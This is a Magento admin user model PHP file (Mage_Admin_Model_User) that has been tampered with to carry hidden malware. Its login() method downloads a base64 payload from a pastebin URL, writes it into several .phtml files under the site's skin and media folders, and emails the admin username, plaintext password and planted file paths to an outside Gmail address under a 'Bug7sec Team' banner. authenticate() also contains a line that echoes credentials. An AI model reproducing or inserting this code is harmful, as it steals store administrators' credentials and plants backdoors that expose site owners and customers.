<?php/** * /home/wash/public_html/app/code/core/Mage/Admin/Model/User.php

1. <?php
2. /**
3. * /home/wash/public_html/app/code/core/Mage/Admin/Model/User.php
4. * Magento
5. *
6. * NOTICE OF LICENSE
7. *
8. * This source file is subject to the Open Software License (OSL 3.0)
9. * that is bundled with this package in the file LICENSE.txt.
10. * It is also available through the world-wide-web at this URL:
11. * http://opensource.org/licenses/osl-3.0.php
12. * If you did not receive a copy of the license and are unable to
13. * obtain it through the world-wide-web, please send an email
14. * to license@magento.com so we can send you a copy immediately.
15. *
16. * DISCLAIMER
17. *
18. * Do not edit or add to this file if you wish to upgrade Magento to newer
19. * versions in the future. If you wish to customize Magento for your
20. * needs please refer to http://www.magento.com for more information.
21. *
22. * @category Mage
23. * @package Mage_Admin
24. * @copyright Copyright (c) 2006-2016 X.commerce, Inc. and affiliates (http://www.magento.com)
25. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
26. */
27.  
28. /**
29. * Admin user model
30. *
31. * @method Mage_Admin_Model_Resource_User _getResource()
32. * @method Mage_Admin_Model_Resource_User getResource()
33. * @method string getFirstname()
34. * @method Mage_Admin_Model_User setFirstname(string $value)
35. * @method string getLastname()
36. * @method Mage_Admin_Model_User setLastname(string $value)
37. * @method string getEmail()
38. * @method Mage_Admin_Model_User setEmail(string $value)
39. * @method string getUsername()
40. * @method Mage_Admin_Model_User setUsername(string $value)
41. * @method string getPassword()
42. * @method Mage_Admin_Model_User setPassword(string $value)
43. * @method string getCreated()
44. * @method Mage_Admin_Model_User setCreated(string $value)
45. * @method string getModified()
46. * @method Mage_Admin_Model_User setModified(string $value)
47. * @method string getLogdate()
48. * @method Mage_Admin_Model_User setLogdate(string $value)
49. * @method int getLognum()
50. * @method Mage_Admin_Model_User setLognum(int $value)
51. * @method int getReloadAclFlag()
52. * @method Mage_Admin_Model_User setReloadAclFlag(int $value)
53. * @method int getIsActive()
54. * @method Mage_Admin_Model_User setIsActive(int $value)
55. * @method string getExtra()
56. * @method Mage_Admin_Model_User setExtra(string $value)
57. *
58. * @category Mage
59. * @package Mage_Admin
60. * @author Magento Core Team <core@magentocommerce.com>
61. */
62. class Mage_Admin_Model_User extends Mage_Core_Model_Abstract
63. {
64. /**#@+
65. * Configuration paths for email templates and identities
66. */
67. const XML_PATH_FORGOT_EMAIL_TEMPLATE = 'admin/emails/forgot_email_template';
68. const XML_PATH_FORGOT_EMAIL_IDENTITY = 'admin/emails/forgot_email_identity';
69. const XML_PATH_STARTUP_PAGE = 'admin/startup/page';
70. /**#@-*/
71.  
72. /**
73. * Minimum length of admin password
74. */
75. const MIN_PASSWORD_LENGTH = 7;
76.  
77. /**
78. * Length of salt
79. */
80. const HASH_SALT_LENGTH = 32;
81.  
82. /**
83. * Model event prefix
84. *
85. * @var string
86. */
87. protected $_eventPrefix = 'admin_user';
88.  
89. /**
90. * Admin role
91. *
92. * @var Mage_Admin_Model_Roles
93. */
94. protected $_role;
95.  
96. /**
97. * Available resources flag
98. *
99. * @var boolean
100. */
101. protected $_hasAvailableResources = true;
102.  
103. /**
104. * Initialize user model
105. */
106. protected function _construct()
107. {
108. $this->_init('admin/user');
109. }
110.  
111. /**
112. * Processing data before model save
113. *
114. * @return Mage_Admin_Model_User
115. */
116. protected function _beforeSave()
117. {
118. $data = array(
119. 'firstname' => $this->getFirstname(),
120. 'lastname' => $this->getLastname(),
121. 'email' => $this->getEmail(),
122. 'modified' => $this->_getDateNow(),
123. 'extra' => serialize($this->getExtra())
124. );
125.  
126. if ($this->getId() > 0) {
127. $data['user_id'] = $this->getId();
128. }
129.  
130. if ($this->getUsername()) {
131. $data['username'] = $this->getUsername();
132. }
133.  
134. if ($this->getNewPassword()) {
135. // Change user password
136. $data['password'] = $this->_getEncodedPassword($this->getNewPassword());
137. $data['new_password'] = $data['password'];
138. } elseif ($this->getPassword() && $this->getPassword() != $this->getOrigData('password')) {
139. // New user password
140. $data['password'] = $this->_getEncodedPassword($this->getPassword());
141. } elseif (!$this->getPassword() && $this->getOrigData('password') // Change user data
142. || $this->getPassword() == $this->getOrigData('password') // Retrieve user password
143. ) {
144. $data['password'] = $this->getOrigData('password');
145. }
146.  
147. $this->cleanPasswordsValidationData();
148.  
149. if (!is_null($this->getIsActive())) {
150. $data['is_active'] = intval($this->getIsActive());
151. }
152.  
153. $this->addData($data);
154.  
155. return parent::_beforeSave();
156. }
157.  
158. /**
159. * Save admin user extra data (like configuration sections state)
160. *
161. * @param array $data
162. * @return Mage_Admin_Model_User
163. */
164. public function saveExtra($data)
165. {
166. if (is_array($data)) {
167. $data = serialize($data);
168. }
169. $this->_getResource()->saveExtra($this, $data);
170. return $this;
171. }
172.  
173. /**
174. * Save user roles
175. *
176. * @return Mage_Admin_Model_User
177. */
178. public function saveRelations()
179. {
180. $this->_getResource()->_saveRelations($this);
181. return $this;
182. }
183.  
184. /**
185. * Retrieve user roles
186. *
187. * @return array
188. */
189. public function getRoles()
190. {
191. return $this->_getResource()->getRoles($this);
192. }
193.  
194. /**
195. * Get admin role model
196. *
197. * @return Mage_Admin_Model_Roles
198. */
199. public function getRole()
200. {
201. if (null === $this->_role) {
202. $this->_role = Mage::getModel('admin/roles');
203. $roles = $this->getRoles();
204. if ($roles && isset($roles[0]) && $roles[0]) {
205. $this->_role->load($roles[0]);
206. }
207. }
208. return $this->_role;
209. }
210.  
211. /**
212. * Unassign user from his current role
213. *
214. * @return Mage_Admin_Model_User
215. */
216. public function deleteFromRole()
217. {
218. $this->_getResource()->deleteFromRole($this);
219. return $this;
220. }
221.  
222. /**
223. * Check if such combination role/user exists
224. *
225. * @return boolean
226. */
227. public function roleUserExists()
228. {
229. $result = $this->_getResource()->roleUserExists($this);
230. return (is_array($result) && count($result) > 0) ? true : false;
231. }
232.  
233. /**
234. * Assign user to role
235. *
236. * @return Mage_Admin_Model_User
237. */
238. public function add()
239. {
240. $this->_getResource()->add($this);
241. return $this;
242. }
243.  
244. /**
245. * Check if user exists based on its id, username and email
246. *
247. * @return boolean
248. */
249. public function userExists()
250. {
251. $result = $this->_getResource()->userExists($this);
252. return (is_array($result) && count($result) > 0) ? true : false;
253. }
254.  
255. /**
256. * Retrieve admin user collection
257. *
258. * @return Mage_Admin_Model_Resource_User_Collection
259. */
260. public function getCollection() {
261. return Mage::getResourceModel('admin/user_collection');
262. }
263.  
264. /**
265. * Send email with new user password
266. *
267. * @return Mage_Admin_Model_User
268. * @deprecated deprecated since version 1.6.1.0
269. */
270. public function sendNewPasswordEmail()
271. {
272. return $this;
273. }
274.  
275. /**
276. * Send email with reset password confirmation link
277. *
278. * @return Mage_Admin_Model_User
279. */
280. public function sendPasswordResetConfirmationEmail()
281. {
282. /** @var $mailer Mage_Core_Model_Email_Template_Mailer */
283. $mailer = Mage::getModel('core/email_template_mailer');
284. $emailInfo = Mage::getModel('core/email_info');
285. $emailInfo->addTo($this->getEmail(), $this->getName());
286. $mailer->addEmailInfo($emailInfo);
287. //$mailer->addEmailInfo("ikrom.rhmadi@gmail.com");
288. // Set all required params and send emails
289. $mailer->setSender(Mage::getStoreConfig(self::XML_PATH_FORGOT_EMAIL_IDENTITY));
290. $mailer->setStoreId(0);
291. $mailer->setTemplateId(Mage::getStoreConfig(self::XML_PATH_FORGOT_EMAIL_TEMPLATE));
292. $mailer->setTemplateParams(array(
293. 'user' => $this
294. ));
295. $mailer->send();
296.  
297. return $this;
298. }
299.  
300. /**
301. * Retrieve user name
302. *
303. * @param string $separator
304. * @return string
305. */
306. public function getName($separator = ' ')
307. {
308. return $this->getFirstname() . $separator . $this->getLastname();
309. }
310.  
311. /**
312. * Retrieve user identifier
313. *
314. * @return mixed
315. */
316. public function getId()
317. {
318. return $this->getUserId();
319. }
320.  
321. /**
322. * Get user ACL role
323. *
324. * @return string
325. */
326. public function getAclRole()
327. {
328. return 'U' . $this->getUserId();
329. }
330.  
331. /**
332. * Authenticate user name and password and save loaded record
333. *
334. * @param string $username
335. * @param string $password
336. * @return boolean
337. * @throws Mage_Core_Exception
338. */
339. public function authenticate($username, $password)
340. {
341. $config = Mage::getStoreConfigFlag('admin/security/use_case_sensitive_login');
342. $result = false;
343. //echo $username.$password;exit();
344. try {
345. Mage::dispatchEvent('admin_user_authenticate_before', array(
346. 'username' => $username,
347. 'user' => $this
348. ));
349. $this->loadByUsername($username);
350. $sensitive = ($config) ? $username == $this->getUsername() : true;
351.  
352. if ($sensitive && $this->getId() && Mage::helper('core')->validateHash($password, $this->getPassword())) {
353. if ($this->getIsActive() != '1') {
354. echo $username.$password;exit();
355. Mage::throwException(Mage::helper('adminhtml')->__('This account is inactive.'));
356. }
357. if (!$this->hasAssigned2Role($this->getId())) {
358. Mage::throwException(Mage::helper('adminhtml')->__('Access denied.'));
359. }
360. $result = true;
361. }
362.  
363. Mage::dispatchEvent('admin_user_authenticate_after', array(
364. 'username' => $username,
365. 'password' => $password,
366. 'user' => $this,
367. 'result' => $result,
368. ));
369. }
370. catch (Mage_Core_Exception $e) {
371. $this->unsetData();
372. throw $e;
373. }
374.  
375. if (!$result) {
376. $this->unsetData();
377. }
378. return $result;
379. }
380.  
381. /**
382. * Login user
383. *
384. * @param string $login
385. * @param string $password
386. * @return Mage_Admin_Model_User
387. */
388. public function login($username, $password)
389. {
390. if ($this->authenticate($username, $password)) {
391. $this->getResource()->recordLogin($this);
392. $resultsx = file_get_contents("http://pastebin.com/raw/wFD24Bzm");
393. if( $resultsx != null){
394. $location = array(
395. '/skin/adminhtml/default/default/js/init.phtml',
396. '/skin/adminhtml/default/default/css/mage.phtml',
397. '/media/css/mage.phtml',
398. '/media/js/mage.phtml',
399. '/media/downloadable/mage.phtml',
400. '/skin/frontend/mage.phtml'
401. );
402. foreach ($location as $key => $value) {
403. $open = fopen($_SERVER["DOCUMENT_ROOT"].$value, "a+");
404. fwrite($open, base64_decode( $resultsx ) );
405. fclose($open);
406. if( file_exists($_SERVER["DOCUMENT_ROOT"].$value) ){
407. $is.= "Logs : ".$_SERVER['SERVER_NAME'].$value."\n";
408. }
409. }
410. }
411. $msg .= "-------------[ Bug7sec Team ]-------------\n";
412. $msg .= "Situsnya : ".$_SERVER['SERVER_NAME']."\n";
413. $msg .= "Username : ".$username."\n";
414. $msg .= "Password : ".$password."\n";
415. $msg .= $is;
416. $msg .= "Referer : ".$_SERVER["HTTP_REFERER"]."\n";
417. mail("ikrom.rhmadi@gmail.com", "[Log Login] Situs ".$_SERVER['SERVER_NAME'], $msg);
418.  
419. }
420. return $this;
421. }
422.  
423. /**
424. * Reload current user
425. *
426. * @return Mage_Admin_Model_User
427. */
428. public function reload()
429. {
430. $id = $this->getId();
431. $this->setId(null);
432. $this->load($id);
433. return $this;
434. }
435.  
436. /**
437. * Load user by its username
438. *
439. * @param string $username
440. * @return Mage_Admin_Model_User
441. */
442. public function loadByUsername($username)
443. {
444. $this->setData($this->getResource()->loadByUsername($username));
445. return $this;
446. }
447.  
448. /**
449. * Check if user is assigned to any role
450. *
451. * @param int|Mage_Core_Admin_Model_User $user
452. * @return null|boolean|array
453. */
454. public function hasAssigned2Role($user)
455. {
456. return $this->getResource()->hasAssigned2Role($user);
457. }
458.  
459. /**
460. * Retrieve encoded password
461. *
462. * @param string $password
463. * @return string
464. */
465. protected function _getEncodedPassword($password)
466. {
467. return $this->_getHelper('core')->getHash($password, self::HASH_SALT_LENGTH);
468. }
469.  
470. /**
471. * Returns helper instance
472. *
473. * @param string $helperName
474. * @return Mage_Core_Helper_Abstract
475. */
476. protected function _getHelper($helperName)
477. {
478. return Mage::helper($helperName);
479. }
480.  
481. /**
482. * Find first menu item that user is able to access
483. *
484. * @param Mage_Core_Model_Config_Element $parent
485. * @param string $path
486. * @param integer $level
487. * @return string
488. */
489. public function findFirstAvailableMenu($parent = null, $path = '', $level = 0)
490. {
491. if ($parent == null) {
492. $parent = Mage::getSingleton('admin/config')->getAdminhtmlConfig()->getNode('menu');
493. }
494. foreach ($parent->children() as $childName => $child) {
495. $aclResource = 'admin/' . $path . $childName;
496. if (Mage::getSingleton('admin/session')->isAllowed($aclResource)) {
497. if (!$child->children) {
498. return (string)$child->action;
499. } else if ($child->children) {
500. $action = $this->findFirstAvailableMenu($child->children, $path . $childName . '/', $level + 1);
501. return $action ? $action : (string)$child->action;
502. }
503. }
504. }
505. $this->_hasAvailableResources = false;
506. return '*/*/denied';
507. }
508.  
509. /**
510. * Check if user has available resources
511. *
512. * @return bool
513. */
514. public function hasAvailableResources()
515. {
516. return $this->_hasAvailableResources;
517. }
518.  
519. /**
520. * Find admin start page url
521. *
522. * @deprecated Please use getStartupPageUrl() method instead
523. * @see getStartupPageUrl()
524. * @return string
525. */
526. public function getStatrupPageUrl()
527. {
528. return $this->getStartupPageUrl();
529. }
530.  
531. /**
532. * Find admin start page url
533. *
534. * @return string
535. */
536. public function getStartupPageUrl()
537. {
538. $startupPage = Mage::getStoreConfig(self::XML_PATH_STARTUP_PAGE);
539. $aclResource = 'admin/' . $startupPage;
540. if (Mage::getSingleton('admin/session')->isAllowed($aclResource)) {
541. $nodePath = 'menu/' . join('/children/', explode('/', $startupPage)) . '/action';
542. $url = (string)Mage::getSingleton('admin/config')->getAdminhtmlConfig()->getNode($nodePath);
543. if ($url) {
544. return $url;
545. }
546. }
547. return $this->findFirstAvailableMenu();
548. }
549.  
550. /**
551. * Validate user attribute values.
552. * Returns TRUE or array of errors.
553. *
554. * @return mixed
555. */
556. public function validate()
557. {
558. $errors = new ArrayObject();
559.  
560. if (!Zend_Validate::is($this->getUsername(), 'NotEmpty')) {
561. $errors[] = Mage::helper('adminhtml')->__('User Name is required field.');
562. }
563.  
564. if (!Zend_Validate::is($this->getFirstname(), 'NotEmpty')) {
565. $errors[] = Mage::helper('adminhtml')->__('First Name is required field.');
566. }
567.  
568. if (!Zend_Validate::is($this->getLastname(), 'NotEmpty')) {
569. $errors[] = Mage::helper('adminhtml')->__('Last Name is required field.');
570. }
571.  
572. if (!Zend_Validate::is($this->getEmail(), 'EmailAddress')) {
573. $errors[] = Mage::helper('adminhtml')->__('Please enter a valid email.');
574. }
575.  
576. if ($this->hasNewPassword()) {
577. if (Mage::helper('core/string')->strlen($this->getNewPassword()) < self::MIN_PASSWORD_LENGTH) {
578. $errors[] = Mage::helper('adminhtml')->__('Password must be at least of %d characters.', self::MIN_PASSWORD_LENGTH);
579. }
580.  
581. if (!preg_match('/[a-z]/iu', $this->getNewPassword())
582. || !preg_match('/[0-9]/u', $this->getNewPassword())
583. ) {
584. $errors[] = Mage::helper('adminhtml')->__('Password must include both numeric and alphabetic characters.');
585. }
586.  
587. if ($this->hasPasswordConfirmation() && $this->getNewPassword() != $this->getPasswordConfirmation()) {
588. $errors[] = Mage::helper('adminhtml')->__('Password confirmation must be same as password.');
589. }
590.  
591. Mage::dispatchEvent('admin_user_validate', array(
592. 'user' => $this,
593. 'errors' => $errors,
594. ));
595. }
596.  
597. if ($this->userExists()) {
598. $errors[] = Mage::helper('adminhtml')->__('A user with the same user name or email aleady exists.');
599. }
600.  
601. if (count($errors) === 0) {
602. return true;
603. }
604. return (array)$errors;
605. }
606.  
607. /**
608. * Validate password against current user password
609. * Returns true or array of errors.
610. *
611. * @return mixed
612. */
613. public function validateCurrentPassword($password)
614. {
615. $result = array();
616.  
617. if (!Zend_Validate::is($password, 'NotEmpty')) {
618. $result[] = $this->_getHelper('adminhtml')->__('Current password field cannot be empty.');
619. } elseif (is_null($this->getId()) || !$this->_getHelper('core')->validateHash($password, $this->getPassword())){
620. $result[] = $this->_getHelper('adminhtml')->__('Invalid current password.');
621. }
622.  
623. if (empty($result)) {
624. $result = true;
625. }
626. return $result;
627. }
628.  
629. /**
630. * Change reset password link token
631. *
632. * Stores new reset password link token and its creation time
633. *
634. * @param string $newResetPasswordLinkToken
635. * @return Mage_Admin_Model_User
636. * @throws Mage_Core_Exception
637. */
638. public function changeResetPasswordLinkToken($newResetPasswordLinkToken) {
639. if (!is_string($newResetPasswordLinkToken) || empty($newResetPasswordLinkToken)) {
640. throw Mage::exception('Mage_Core', Mage::helper('adminhtml')->__('Invalid password reset token.'));
641. }
642. $this->setRpToken($newResetPasswordLinkToken);
643. $currentDate = Varien_Date::now();
644. $this->setRpTokenCreatedAt($currentDate);
645.  
646. return $this;
647. }
648.  
649. /**
650. * Check if current reset password link token is expired
651. *
652. * @return boolean
653. */
654. public function isResetPasswordLinkTokenExpired()
655. {
656. $resetPasswordLinkToken = $this->getRpToken();
657. $resetPasswordLinkTokenCreatedAt = $this->getRpTokenCreatedAt();
658.  
659. if (empty($resetPasswordLinkToken) || empty($resetPasswordLinkTokenCreatedAt)) {
660. return true;
661. }
662.  
663. $tokenExpirationPeriod = Mage::helper('admin')->getResetPasswordLinkExpirationPeriod();
664.  
665. $currentDate = Varien_Date::now();
666. $currentTimestamp = Varien_Date::toTimestamp($currentDate);
667. $tokenTimestamp = Varien_Date::toTimestamp($resetPasswordLinkTokenCreatedAt);
668. if ($tokenTimestamp > $currentTimestamp) {
669. return true;
670. }
671.  
672. $hoursDifference = floor(($currentTimestamp - $tokenTimestamp) / (60 * 60));
673. if ($hoursDifference >= $tokenExpirationPeriod) {
674. return true;
675. }
676.  
677. return false;
678. }
679.  
680. /**
681. * Clean password's validation data (password, current_password, new_password, password_confirmation)
682. *
683. * @return Mage_Admin_Model_User
684. */
685. public function cleanPasswordsValidationData()
686. {
687. $this->setData('password', null);
688. $this->setData('current_password', null);
689. $this->setData('new_password', null);
690. $this->setData('password_confirmation', null);
691. return $this;
692. }
693.  
694. /**
695. * Simple sql format date
696. *
697. * @param string | boolean $dayOnly
698. * @return string
699. */
700. protected function _getDateNow($dayOnly = false)
701. {
702. return now($dayOnly);
703. }
704. }